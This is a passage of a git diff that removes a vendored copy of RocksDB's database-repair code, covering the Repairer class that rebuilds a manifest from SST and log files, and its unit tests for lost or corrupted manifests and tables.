-// (d) Write Descriptor
-//
-// (a) Find files
-//
-// The repairer goes through all the files in the directory, and classifies them
-// based on their file name. Any file that cannot be identified by name will be
-// ignored.
-//
-// (b) Convert logs to table
-//
-// Every log file that is active is replayed. All sections of the file where the
-// checksum does not match is skipped over. We intentionally give preference to
-// data consistency.
-//
-// (c) Extract metadata
-//
-// We scan every table to compute
-// (1) smallest/largest for the table
-// (2) largest sequence number in the table
-//
-// If we are unable to scan the file, then we ignore the table.
-//
-// (d) Write Descriptor
-//
-// We generate descriptor contents:
-//  - log number is set to zero
-//  - next-file-number is set to 1 + largest file number we found
-//  - last-sequence-number is set to largest sequence# found across
-//    all tables (see 2c)
-//  - compaction pointers are cleared
-//  - every table file is added at level 0
-//
-// Possible optimization 1:
-//   (a) Compute total size and use to pick appropriate max-level M
-//   (b) Sort tables by largest sequence# in the table
-//   (c) For each table: if it overlaps earlier table, place in level-0,
-//       else place in level-M.
-//   (d) We can provide options for time consistent recovery and unsafe recovery
-//       (ignore checksum failure when applicable)
-// Possible optimization 2:
-//   Store per-table metadata (smallest, largest, largest-seq#, ...)
-//   in the table's meta section to speed up ScanTable.
-
-#ifndef ROCKSDB_LITE
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include "db/builder.h"
-#include "db/db_impl.h"
-#include "db/dbformat.h"
-#include "db/log_reader.h"
-#include "db/log_writer.h"
-#include "db/memtable.h"
-#include "db/table_cache.h"
-#include "db/version_edit.h"
-#include "db/write_batch_internal.h"
-#include "options/cf_options.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "rocksdb/write_buffer_manager.h"
-#include "table/scoped_arena_iterator.h"
-#include "util/file_reader_writer.h"
-#include "util/filename.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-namespace {
-
-class Repairer {
- public:
-  Repairer(const std::string& dbname, const DBOptions& db_options,
-           const std::vector<ColumnFamilyDescriptor>& column_families,
-           const ColumnFamilyOptions& default_cf_opts,
-           const ColumnFamilyOptions& unknown_cf_opts, bool create_unknown_cfs)
-      : dbname_(dbname),
-        env_(db_options.env),
-        env_options_(),
-        db_options_(SanitizeOptions(dbname_, db_options)),
-        immutable_db_options_(db_options_),
-        icmp_(default_cf_opts.comparator),
-        default_cf_opts_(default_cf_opts),
-        default_cf_iopts_(
-            ImmutableCFOptions(immutable_db_options_, default_cf_opts)),
-        unknown_cf_opts_(unknown_cf_opts),
-        create_unknown_cfs_(create_unknown_cfs),
-        raw_table_cache_(
-            // TableCache can be small since we expect each table to be opened
-            // once.
-            NewLRUCache(10, db_options_.table_cache_numshardbits)),
-        table_cache_(new TableCache(default_cf_iopts_, env_options_,
-                                    raw_table_cache_.get())),
-        wb_(db_options_.db_write_buffer_size),
-        wc_(db_options_.delayed_write_rate),
-        vset_(dbname_, &immutable_db_options_, env_options_,
-              raw_table_cache_.get(), &wb_, &wc_),
-        next_file_number_(1) {
-    for (const auto& cfd : column_families) {
-      cf_name_to_opts_[cfd.name] = cfd.options;
-    }
-  }
-
-  const ColumnFamilyOptions* GetColumnFamilyOptions(
-      const std::string& cf_name) {
-    if (cf_name_to_opts_.find(cf_name) == cf_name_to_opts_.end()) {
-      if (create_unknown_cfs_) {
-        return &unknown_cf_opts_;
-      }
-      return nullptr;
-    }
-    return &cf_name_to_opts_[cf_name];
-  }
-
-  // Adds a column family to the VersionSet with cf_options_ and updates
-  // manifest.
-  Status AddColumnFamily(const std::string& cf_name, uint32_t cf_id) {
-    const auto* cf_opts = GetColumnFamilyOptions(cf_name);
-    if (cf_opts == nullptr) {
-      return Status::Corruption("Encountered unknown column family with name=" +
-                                cf_name + ", id=" + ToString(cf_id));
-    }
-    Options opts(db_options_, *cf_opts);
-    MutableCFOptions mut_cf_opts(opts);
-
-    VersionEdit edit;
-    edit.SetComparatorName(opts.comparator->Name());
-    edit.SetLogNumber(0);
-    edit.SetColumnFamily(cf_id);
-    ColumnFamilyData* cfd;
-    cfd = nullptr;
-    edit.AddColumnFamily(cf_name);
-
-    mutex_.Lock();
-    Status status = vset_.LogAndApply(cfd, mut_cf_opts, &edit, &mutex_,
-                                      nullptr /* db_directory */,
-                                      false /* new_descriptor_log */, cf_opts);
-    mutex_.Unlock();
-    return status;
-  }
-
-  ~Repairer() {
-    delete table_cache_;
-  }
-
-  Status Run() {
-    Status status = FindFiles();
-    if (status.ok()) {
-      // Discard older manifests and start a fresh one
-      for (size_t i = 0; i < manifests_.size(); i++) {
-        ArchiveFile(dbname_ + "/" + manifests_[i]);
-      }
-      // Just create a DBImpl temporarily so we can reuse NewDB()
-      DBImpl* db_impl = new DBImpl(db_options_, dbname_);
-      status = db_impl->NewDB();
-      delete db_impl;
-    }
-
-    if (status.ok()) {
-      // Recover using the fresh manifest created by NewDB()
-      status =
-          vset_.Recover({{kDefaultColumnFamilyName, default_cf_opts_}}, false);
-    }
-    if (status.ok()) {
-      // Need to scan existing SST files first so the column families are
-      // created before we process WAL files
-      ExtractMetaData();
-
-      // ExtractMetaData() uses table_fds_ to know which SST files' metadata to
-      // extract -- we need to clear it here since metadata for existing SST
-      // files has been extracted already
-      table_fds_.clear();
-      ConvertLogFilesToTables();
-      ExtractMetaData();
-      status = AddTables();
-    }
-    if (status.ok()) {
-      uint64_t bytes = 0;
-      for (size_t i = 0; i < tables_.size(); i++) {
-        bytes += tables_[i].meta.fd.GetFileSize();
-      }
-      ROCKS_LOG_WARN(db_options_.info_log,
-                     "**** Repaired rocksdb %s; "
-                     "recovered %" ROCKSDB_PRIszt " files; %" PRIu64
-                     "bytes. "
-                     "Some data may have been lost. "
-                     "****",
-                     dbname_.c_str(), tables_.size(), bytes);
-    }
-    return status;
-  }
-
- private:
-  struct TableInfo {
-    FileMetaData meta;
-    uint32_t column_family_id;
-    std::string column_family_name;
-    SequenceNumber min_sequence;
-    SequenceNumber max_sequence;
-  };
-
-  std::string const dbname_;
-  Env* const env_;
-  const EnvOptions env_options_;
-  const DBOptions db_options_;
-  const ImmutableDBOptions immutable_db_options_;
-  const InternalKeyComparator icmp_;
-  const ColumnFamilyOptions default_cf_opts_;
-  const ImmutableCFOptions default_cf_iopts_;  // table_cache_ holds reference
-  const ColumnFamilyOptions unknown_cf_opts_;
-  const bool create_unknown_cfs_;
-  std::shared_ptr<Cache> raw_table_cache_;
-  TableCache* table_cache_;
-  WriteBufferManager wb_;
-  WriteController wc_;
-  VersionSet vset_;
-  std::unordered_map<std::string, ColumnFamilyOptions> cf_name_to_opts_;
-  InstrumentedMutex mutex_;
-
-  std::vector<std::string> manifests_;
-  std::vector<FileDescriptor> table_fds_;
-  std::vector<uint64_t> logs_;
-  std::vector<TableInfo> tables_;
-  uint64_t next_file_number_;
-
-  Status FindFiles() {
-    std::vector<std::string> filenames;
-    bool found_file = false;
-    std::vector<std::string> to_search_paths;
-
-    for (size_t path_id = 0; path_id < db_options_.db_paths.size(); path_id++) {
-        to_search_paths.push_back(db_options_.db_paths[path_id].path);
-    }
-
-    // search wal_dir if user uses a customize wal_dir
-    if (!db_options_.wal_dir.empty() && 
-        db_options_.wal_dir != dbname_) {
-        to_search_paths.push_back(db_options_.wal_dir);
-    }
-
-    for (size_t path_id = 0; path_id < to_search_paths.size(); path_id++) {
-      Status status =
-          env_->GetChildren(to_search_paths[path_id], &filenames);
-      if (!status.ok()) {
-        return status;
-      }
-      if (!filenames.empty()) {
-        found_file = true;
-      }
-
-      uint64_t number;
-      FileType type;
-      for (size_t i = 0; i < filenames.size(); i++) {
-        if (ParseFileName(filenames[i], &number, &type)) {
-          if (type == kDescriptorFile) {
-            manifests_.push_back(filenames[i]);
-          } else {
-            if (number + 1 > next_file_number_) {
-              next_file_number_ = number + 1;
-            }
-            if (type == kLogFile) {
-              logs_.push_back(number);
-            } else if (type == kTableFile) {
-              table_fds_.emplace_back(number, static_cast<uint32_t>(path_id),
-                                      0);
-            } else {
-              // Ignore other files
-            }
-          }
-        }
-      }
-    }
-    if (!found_file) {
-      return Status::Corruption(dbname_, "repair found no files");
-    }
-    return Status::OK();
-  }
-
-  void ConvertLogFilesToTables() {
-    for (size_t i = 0; i < logs_.size(); i++) {
-      // we should use LogFileName(wal_dir, logs_[i]) here. user might uses wal_dir option.
-      std::string logname = LogFileName(db_options_.wal_dir, logs_[i]);
-      Status status = ConvertLogToTable(logs_[i]);
-      if (!status.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "Log #%" PRIu64 ": ignoring conversion error: %s",
-                       logs_[i], status.ToString().c_str());
-      }
-      ArchiveFile(logname);
-    }
-  }
-
-  Status ConvertLogToTable(uint64_t log) {
-    struct LogReporter : public log::Reader::Reporter {
-      Env* env;
-      std::shared_ptr<Logger> info_log;
-      uint64_t lognum;
-      virtual void Corruption(size_t bytes, const Status& s) override {
-        // We print error messages for corruption, but continue repairing.
-        ROCKS_LOG_ERROR(info_log, "Log #%" PRIu64 ": dropping %d bytes; %s",
-                        lognum, static_cast<int>(bytes), s.ToString().c_str());
-      }
-    };
-
-    // Open the log file
-    std::string logname = LogFileName(db_options_.wal_dir, log);
-    unique_ptr<SequentialFile> lfile;
-    Status status = env_->NewSequentialFile(
-        logname, &lfile, env_->OptimizeForLogRead(env_options_));
-    if (!status.ok()) {
-      return status;
-    }
-    unique_ptr<SequentialFileReader> lfile_reader(
-        new SequentialFileReader(std::move(lfile)));
-
-    // Create the log reader.
-    LogReporter reporter;
-    reporter.env = env_;
-    reporter.info_log = db_options_.info_log;
-    reporter.lognum = log;
-    // We intentionally make log::Reader do checksumming so that
-    // corruptions cause entire commits to be skipped instead of
-    // propagating bad information (like overly large sequence
-    // numbers).
-    log::Reader reader(db_options_.info_log, std::move(lfile_reader), &reporter,
-                       true /*enable checksum*/, 0 /*initial_offset*/, log);
-
-    // Initialize per-column family memtables
-    for (auto* cfd : *vset_.GetColumnFamilySet()) {
-      cfd->CreateNewMemtable(*cfd->GetLatestMutableCFOptions(),
-                             kMaxSequenceNumber);
-    }
-    auto cf_mems = new ColumnFamilyMemTablesImpl(vset_.GetColumnFamilySet());
-
-    // Read all the records and add to a memtable
-    std::string scratch;
-    Slice record;
-    WriteBatch batch;
-    int counter = 0;
-    while (reader.ReadRecord(&record, &scratch)) {
-      if (record.size() < WriteBatchInternal::kHeader) {
-        reporter.Corruption(
-            record.size(), Status::Corruption("log record too small"));
-        continue;
-      }
-      WriteBatchInternal::SetContents(&batch, record);
-      status = WriteBatchInternal::InsertInto(&batch, cf_mems, nullptr);
-      if (status.ok()) {
-        counter += WriteBatchInternal::Count(&batch);
-      } else {
-        ROCKS_LOG_WARN(db_options_.info_log, "Log #%" PRIu64 ": ignoring %s",
-                       log, status.ToString().c_str());
-        status = Status::OK();  // Keep going with rest of file
-      }
-    }
-
-    // Dump a table for each column family with entries in this log file.
-    for (auto* cfd : *vset_.GetColumnFamilySet()) {
-      // Do not record a version edit for this conversion to a Table
-      // since ExtractMetaData() will also generate edits.
-      MemTable* mem = cfd->mem();
-      if (mem->IsEmpty()) {
-        continue;
-      }
-
-      FileMetaData meta;
-      meta.fd = FileDescriptor(next_file_number_++, 0, 0);
-      ReadOptions ro;
-      ro.total_order_seek = true;
-      Arena arena;
-      ScopedArenaIterator iter(mem->NewIterator(ro, &arena));
-      EnvOptions optimized_env_options =
-          env_->OptimizeForCompactionTableWrite(env_options_, immutable_db_options_);
-
-      int64_t _current_time = 0;
-      status = env_->GetCurrentTime(&_current_time);  // ignore error
-      const uint64_t current_time = static_cast<uint64_t>(_current_time);
-
-      status = BuildTable(
-          dbname_, env_, *cfd->ioptions(), *cfd->GetLatestMutableCFOptions(),
-          optimized_env_options, table_cache_, iter.get(),
-          std::unique_ptr<InternalIterator>(mem->NewRangeTombstoneIterator(ro)),
-          &meta, cfd->internal_comparator(),
-          cfd->int_tbl_prop_collector_factories(), cfd->GetID(), cfd->GetName(),
-          {}, kMaxSequenceNumber, kNoCompression, CompressionOptions(), false,
-          nullptr /* internal_stats */, TableFileCreationReason::kRecovery,
-          nullptr /* event_logger */, 0 /* job_id */, Env::IO_HIGH,
-          nullptr /* table_properties */, -1 /* level */, current_time);
-      ROCKS_LOG_INFO(db_options_.info_log,
-                     "Log #%" PRIu64 ": %d ops saved to Table #%" PRIu64 " %s",
-                     log, counter, meta.fd.GetNumber(),
-                     status.ToString().c_str());
-      if (status.ok()) {
-        if (meta.fd.GetFileSize() > 0) {
-          table_fds_.push_back(meta.fd);
-        }
-      } else {
-        break;
-      }
-    }
-    delete cf_mems;
-    return status;
-  }
-
-  void ExtractMetaData() {
-    for (size_t i = 0; i < table_fds_.size(); i++) {
-      TableInfo t;
-      t.meta.fd = table_fds_[i];
-      Status status = ScanTable(&t);
-      if (!status.ok()) {
-        std::string fname = TableFileName(
-            db_options_.db_paths, t.meta.fd.GetNumber(), t.meta.fd.GetPathId());
-        char file_num_buf[kFormatFileNumberBufSize];
-        FormatFileNumber(t.meta.fd.GetNumber(), t.meta.fd.GetPathId(),
-                         file_num_buf, sizeof(file_num_buf));
-        ROCKS_LOG_WARN(db_options_.info_log, "Table #%s: ignoring %s",
-                       file_num_buf, status.ToString().c_str());
-        ArchiveFile(fname);
-      } else {
-        tables_.push_back(t);
-      }
-    }
-  }
-
-  Status ScanTable(TableInfo* t) {
-    std::string fname = TableFileName(
-        db_options_.db_paths, t->meta.fd.GetNumber(), t->meta.fd.GetPathId());
-    int counter = 0;
-    uint64_t file_size;
-    Status status = env_->GetFileSize(fname, &file_size);
-    t->meta.fd = FileDescriptor(t->meta.fd.GetNumber(), t->meta.fd.GetPathId(),
-                                file_size);
-    std::shared_ptr<const TableProperties> props;
-    if (status.ok()) {
-      status = table_cache_->GetTableProperties(env_options_, icmp_, t->meta.fd,
-                                                &props);
-    }
-    if (status.ok()) {
-      t->column_family_id = static_cast<uint32_t>(props->column_family_id);
-      if (t->column_family_id ==
-          TablePropertiesCollectorFactory::Context::kUnknownColumnFamily) {
-        ROCKS_LOG_WARN(
-            db_options_.info_log,
-            "Table #%" PRIu64
-            ": column family unknown (probably due to legacy format); "
-            "adding to default column family id 0.",
-            t->meta.fd.GetNumber());
-        t->column_family_id = 0;
-      }
-
-      if (vset_.GetColumnFamilySet()->GetColumnFamily(t->column_family_id) ==
-          nullptr) {
-        status =
-            AddColumnFamily(props->column_family_name, t->column_family_id);
-      }
-    }
-    ColumnFamilyData* cfd = nullptr;
-    if (status.ok()) {
-      cfd = vset_.GetColumnFamilySet()->GetColumnFamily(t->column_family_id);
-      if (cfd->GetName() != props->column_family_name) {
-        ROCKS_LOG_ERROR(
-            db_options_.info_log,
-            "Table #%" PRIu64
-            ": inconsistent column family name '%s'; expected '%s' for column "
-            "family id %" PRIu32 ".",
-            t->meta.fd.GetNumber(), props->column_family_name.c_str(),
-            cfd->GetName().c_str(), t->column_family_id);
-        status = Status::Corruption(dbname_, "inconsistent column family name");
-      }
-    }
-    if (status.ok()) {
-      InternalIterator* iter = table_cache_->NewIterator(
-          ReadOptions(), env_options_, cfd->internal_comparator(), t->meta.fd,
-          nullptr /* range_del_agg */);
-      bool empty = true;
-      ParsedInternalKey parsed;
-      t->min_sequence = 0;
-      t->max_sequence = 0;
-      for (iter->SeekToFirst(); iter->Valid(); iter->Next()) {
-        Slice key = iter->key();
-        if (!ParseInternalKey(key, &parsed)) {
-          ROCKS_LOG_ERROR(db_options_.info_log,
-                          "Table #%" PRIu64 ": unparsable key %s",
-                          t->meta.fd.GetNumber(), EscapeString(key).c_str());
-          continue;
-        }
-
-        counter++;
-        if (empty) {
-          empty = false;
-          t->meta.smallest.DecodeFrom(key);
-          t->min_sequence = parsed.sequence;
-        }
-        t->meta.largest.DecodeFrom(key);
-        if (parsed.sequence < t->min_sequence) {
-          t->min_sequence = parsed.sequence;
-        }
-        if (parsed.sequence > t->max_sequence) {
-          t->max_sequence = parsed.sequence;
-        }
-      }
-      if (!iter->status().ok()) {
-        status = iter->status();
-      }
-      delete iter;
-
-      ROCKS_LOG_INFO(db_options_.info_log, "Table #%" PRIu64 ": %d entries %s",
-                     t->meta.fd.GetNumber(), counter,
-                     status.ToString().c_str());
-    }
-    return status;
-  }
-
-  Status AddTables() {
-    std::unordered_map<uint32_t, std::vector<const TableInfo*>> cf_id_to_tables;
-    SequenceNumber max_sequence = 0;
-    for (size_t i = 0; i < tables_.size(); i++) {
-      cf_id_to_tables[tables_[i].column_family_id].push_back(&tables_[i]);
-      if (max_sequence < tables_[i].max_sequence) {
-        max_sequence = tables_[i].max_sequence;
-      }
-    }
-    vset_.SetLastToBeWrittenSequence(max_sequence);
-    vset_.SetLastSequence(max_sequence);
-
-    for (const auto& cf_id_and_tables : cf_id_to_tables) {
-      auto* cfd =
-          vset_.GetColumnFamilySet()->GetColumnFamily(cf_id_and_tables.first);
-      VersionEdit edit;
-      edit.SetComparatorName(cfd->user_comparator()->Name());
-      edit.SetLogNumber(0);
-      edit.SetNextFile(next_file_number_);
-      edit.SetColumnFamily(cfd->GetID());
-
-      // TODO(opt): separate out into multiple levels
-      for (const auto* table : cf_id_and_tables.second) {
-        edit.AddFile(0, table->meta.fd.GetNumber(), table->meta.fd.GetPathId(),
-                     table->meta.fd.GetFileSize(), table->meta.smallest,
-                     table->meta.largest, table->min_sequence,
-                     table->max_sequence, table->meta.marked_for_compaction);
-      }
-      mutex_.Lock();
-      Status status = vset_.LogAndApply(
-          cfd, *cfd->GetLatestMutableCFOptions(), &edit, &mutex_,
-          nullptr /* db_directory */, false /* new_descriptor_log */);
-      mutex_.Unlock();
-      if (!status.ok()) {
-        return status;
-      }
-    }
-    return Status::OK();
-  }
-
-  void ArchiveFile(const std::string& fname) {
-    // Move into another directory.  E.g., for
-    //    dir/foo
-    // rename to
-    //    dir/lost/foo
-    const char* slash = strrchr(fname.c_str(), '/');
-    std::string new_dir;
-    if (slash != nullptr) {
-      new_dir.assign(fname.data(), slash - fname.data());
-    }
-    new_dir.append("/lost");
-    env_->CreateDir(new_dir);  // Ignore error
-    std::string new_file = new_dir;
-    new_file.append("/");
-    new_file.append((slash == nullptr) ? fname.c_str() : slash + 1);
-    Status s = env_->RenameFile(fname, new_file);
-    ROCKS_LOG_INFO(db_options_.info_log, "Archiving %s: %s\n", fname.c_str(),
-                   s.ToString().c_str());
-  }
-};
-
-Status GetDefaultCFOptions(
-    const std::vector<ColumnFamilyDescriptor>& column_families,
-    ColumnFamilyOptions* res) {
-  assert(res != nullptr);
-  auto iter = std::find_if(column_families.begin(), column_families.end(),
-                           [](const ColumnFamilyDescriptor& cfd) {
-                             return cfd.name == kDefaultColumnFamilyName;
-                           });
-  if (iter == column_families.end()) {
-    return Status::InvalidArgument(
-        "column_families", "Must contain entry for default column family");
-  }
-  *res = iter->options;
-  return Status::OK();
-}
-}  // anonymous namespace
-
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families) {
-  ColumnFamilyOptions default_cf_opts;
-  Status status = GetDefaultCFOptions(column_families, &default_cf_opts);
-  if (status.ok()) {
-    Repairer repairer(dbname, db_options, column_families, default_cf_opts,
-                      ColumnFamilyOptions() /* unknown_cf_opts */,
-                      false /* create_unknown_cfs */);
-    status = repairer.Run();
-  }
-  return status;
-}
-
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                const ColumnFamilyOptions& unknown_cf_opts) {
-  ColumnFamilyOptions default_cf_opts;
-  Status status = GetDefaultCFOptions(column_families, &default_cf_opts);
-  if (status.ok()) {
-    Repairer repairer(dbname, db_options, column_families, default_cf_opts,
-                      unknown_cf_opts, true /* create_unknown_cfs */);
-    status = repairer.Run();
-  }
-  return status;
-}
-
-Status RepairDB(const std::string& dbname, const Options& options) {
-  DBOptions db_options(options);
-  ColumnFamilyOptions cf_options(options);
-  Repairer repairer(dbname, db_options, {}, cf_options /* default_cf_opts */,
-                    cf_options /* unknown_cf_opts */,
-                    true /* create_unknown_cfs */);
-  return repairer.Run();
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/db/repair_test.cc b/thirdparty/rocksdb/db/repair_test.cc
deleted file mode 100644
index b267c6d..0000000
--- a/thirdparty/rocksdb/db/repair_test.cc
+++ /dev/null
@@ -1,328 +0,0 @@
-//  Copyright (c) 2016-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/db_impl.h"
-#include "db/db_test_util.h"
-#include "rocksdb/comparator.h"
-#include "rocksdb/db.h"
-#include "rocksdb/transaction_log.h"
-#include "util/file_util.h"
-#include "util/string_util.h"
-
-namespace rocksdb {
-
-#ifndef ROCKSDB_LITE
-class RepairTest : public DBTestBase {
- public:
-  RepairTest() : DBTestBase("/repair_test") {}
-
-  std::string GetFirstSstPath() {
-    uint64_t manifest_size;
-    std::vector<std::string> files;
-    db_->GetLiveFiles(files, &manifest_size);
-    auto sst_iter =
-        std::find_if(files.begin(), files.end(), [](const std::string& file) {
-          uint64_t number;
-          FileType type;
-          bool ok = ParseFileName(file, &number, &type);
-          return ok && type == kTableFile;
-        });
-    return sst_iter == files.end() ? "" : dbname_ + *sst_iter;
-  }
-};
-
-TEST_F(RepairTest, LostManifest) {
-  // Add a couple SST files, delete the manifest, and verify RepairDB() saves
-  // the day.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, CorruptManifest) {
-  // Manifest is in an invalid format. Expect a full recovery.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but overwrite it after Close()
-  // to ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  CreateFile(env_, manifest_path, "blah");
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, IncompleteManifest) {
-  // In this case, the manifest is valid but does not reference all of the SST
-  // files. Expect a full recovery.
-  Put("key", "val");
-  Flush();
-  std::string orig_manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-  CopyFile(orig_manifest_path, orig_manifest_path + ".tmp");
-  Put("key2", "val2");
-  Flush();
-  // Need to get path before Close() deletes db_, but overwrite it after Close()
-  // to ensure Close() didn't change the manifest.
-  std::string new_manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(new_manifest_path));
-  // Replace the manifest with one that is only aware of the first SST file.
-  CopyFile(orig_manifest_path + ".tmp", new_manifest_path);
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_EQ(Get("key"), "val");
-  ASSERT_EQ(Get("key2"), "val2");
-}
-
-TEST_F(RepairTest, LostSst) {
-  // Delete one of the SST files but preserve the manifest that refers to it,
-  // then verify the DB is still usable for the intact SST.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  auto sst_path = GetFirstSstPath();
-  ASSERT_FALSE(sst_path.empty());
-  ASSERT_OK(env_->DeleteFile(sst_path));
-
-  Close();
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  // Exactly one of the key-value pairs should be in the DB now.
-  ASSERT_TRUE((Get("key") == "val") != (Get("key2") == "val2"));
-}
-
-TEST_F(RepairTest, CorruptSst) {
-  // Corrupt one of the SST files but preserve the manifest that refers to it,
-  // then verify the DB is still usable for the intact SST.
-  Put("key", "val");
-  Flush();
-  Put("key2", "val2");
-  Flush();
-  auto sst_path = GetFirstSstPath();
-  ASSERT_FALSE(sst_path.empty());
-  CreateFile(env_, sst_path, "blah");
-
-  Close();
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  // Exactly one of the key-value pairs should be in the DB now.
-  ASSERT_TRUE((Get("key") == "val") != (Get("key2") == "val2"));
-}
-
-TEST_F(RepairTest, UnflushedSst) {
-  // This test case invokes repair while some data is unflushed, then verifies
-  // that data is in the db.
-  Put("key", "val");
-  VectorLogPtr wal_files;
-  ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-  ASSERT_EQ(wal_files.size(), 1);
-  uint64_t total_ssts_size;
-  GetAllSSTFiles(&total_ssts_size);
-  ASSERT_EQ(total_ssts_size, 0);
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() didn't change the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-  Reopen(CurrentOptions());
-
-  ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-  ASSERT_EQ(wal_files.size(), 0);
-  GetAllSSTFiles(&total_ssts_size);
-  ASSERT_GT(total_ssts_size, 0);
-  ASSERT_EQ(Get("key"), "val");
-}
-
-TEST_F(RepairTest, SeparateWalDir) {
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-    Put("key", "val");
-    Put("foo", "bar");
-    VectorLogPtr wal_files;
-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    ASSERT_EQ(wal_files.size(), 1);
-    uint64_t total_ssts_size;
-    GetAllSSTFiles(&total_ssts_size);
-    ASSERT_EQ(total_ssts_size, 0);
-    std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-
-    Close();
-    ASSERT_OK(env_->FileExists(manifest_path));
-    ASSERT_OK(env_->DeleteFile(manifest_path));
-    ASSERT_OK(RepairDB(dbname_, options));
-
-    // make sure that all WALs are converted to SSTables.
-    options.wal_dir = "";
-
-    Reopen(options);
-    ASSERT_OK(dbfull()->GetSortedWalFiles(wal_files));
-    ASSERT_EQ(wal_files.size(), 0);
-    GetAllSSTFiles(&total_ssts_size);
-    ASSERT_GT(total_ssts_size, 0);
-    ASSERT_EQ(Get("key"), "val");
-    ASSERT_EQ(Get("foo"), "bar");
-
- } while(ChangeWalOptions());
-}
-
-TEST_F(RepairTest, RepairMultipleColumnFamilies) {
-  // Verify repair logic associates SST files with their original column
-  // families.
-  const int kNumCfs = 3;
-  const int kEntriesPerCf = 2;
-  DestroyAndReopen(CurrentOptions());
-  CreateAndReopenWithCF({"pikachu1", "pikachu2"}, CurrentOptions());
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      Put(i, "key" + ToString(j), "val" + ToString(j));
-      if (j == kEntriesPerCf - 1 && i == kNumCfs - 1) {
-        // Leave one unflushed so we can verify WAL entries are properly
-        // associated with column families.
-        continue;
-      }
-      Flush(i);
-    }
-  }
-
-  // Need to get path before Close() deletes db_, but delete it after Close() to
-  // ensure Close() doesn't re-create the manifest.
-  std::string manifest_path =
-      DescriptorFileName(dbname_, dbfull()->TEST_Current_Manifest_FileNo());
-  Close();
-  ASSERT_OK(env_->FileExists(manifest_path));
-  ASSERT_OK(env_->DeleteFile(manifest_path));
-
-  ASSERT_OK(RepairDB(dbname_, CurrentOptions()));
-
-  ReopenWithColumnFamilies({"default", "pikachu1", "pikachu2"},
-                           CurrentOptions());
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      ASSERT_EQ(Get(i, "key" + ToString(j)), "val" + ToString(j));
-    }
-  }
-}
-
-TEST_F(RepairTest, RepairColumnFamilyOptions) {
-  // Verify repair logic uses correct ColumnFamilyOptions when repairing a
-  // database with different options for column families.
-  const int kNumCfs = 2;
-  const int kEntriesPerCf = 2;
-
-  Options opts(CurrentOptions()), rev_opts(CurrentOptions());
-  opts.comparator = BytewiseComparator();
-  rev_opts.comparator = ReverseBytewiseComparator();
-
-  DestroyAndReopen(opts);
-  CreateColumnFamilies({"reverse"}, rev_opts);
-  ReopenWithColumnFamilies({"default", "reverse"},
-                           std::vector<Options>{opts, rev_opts});
-  for (int i = 0; i < kNumCfs; ++i) {
-    for (int j = 0; j < kEntriesPerCf; ++j) {
-      Put(i, "key" + ToString(j), "val" + ToString(j));
-      if (i == kNumCfs - 1 && j == kEntriesPerCf - 1) {
-        // Leave one unflushed so we can verify RepairDB's flush logic
-        continue;
-      }
-      Flush(i);
-    }
-  }
-  Close();
-
-  // RepairDB() records the comparator in the manifest, and DB::Open would fail
-  // if a different comparator were used.
-  ASSERT_OK(RepairDB(dbname_, opts, {{"default", opts}, {"reverse", rev_opts}},
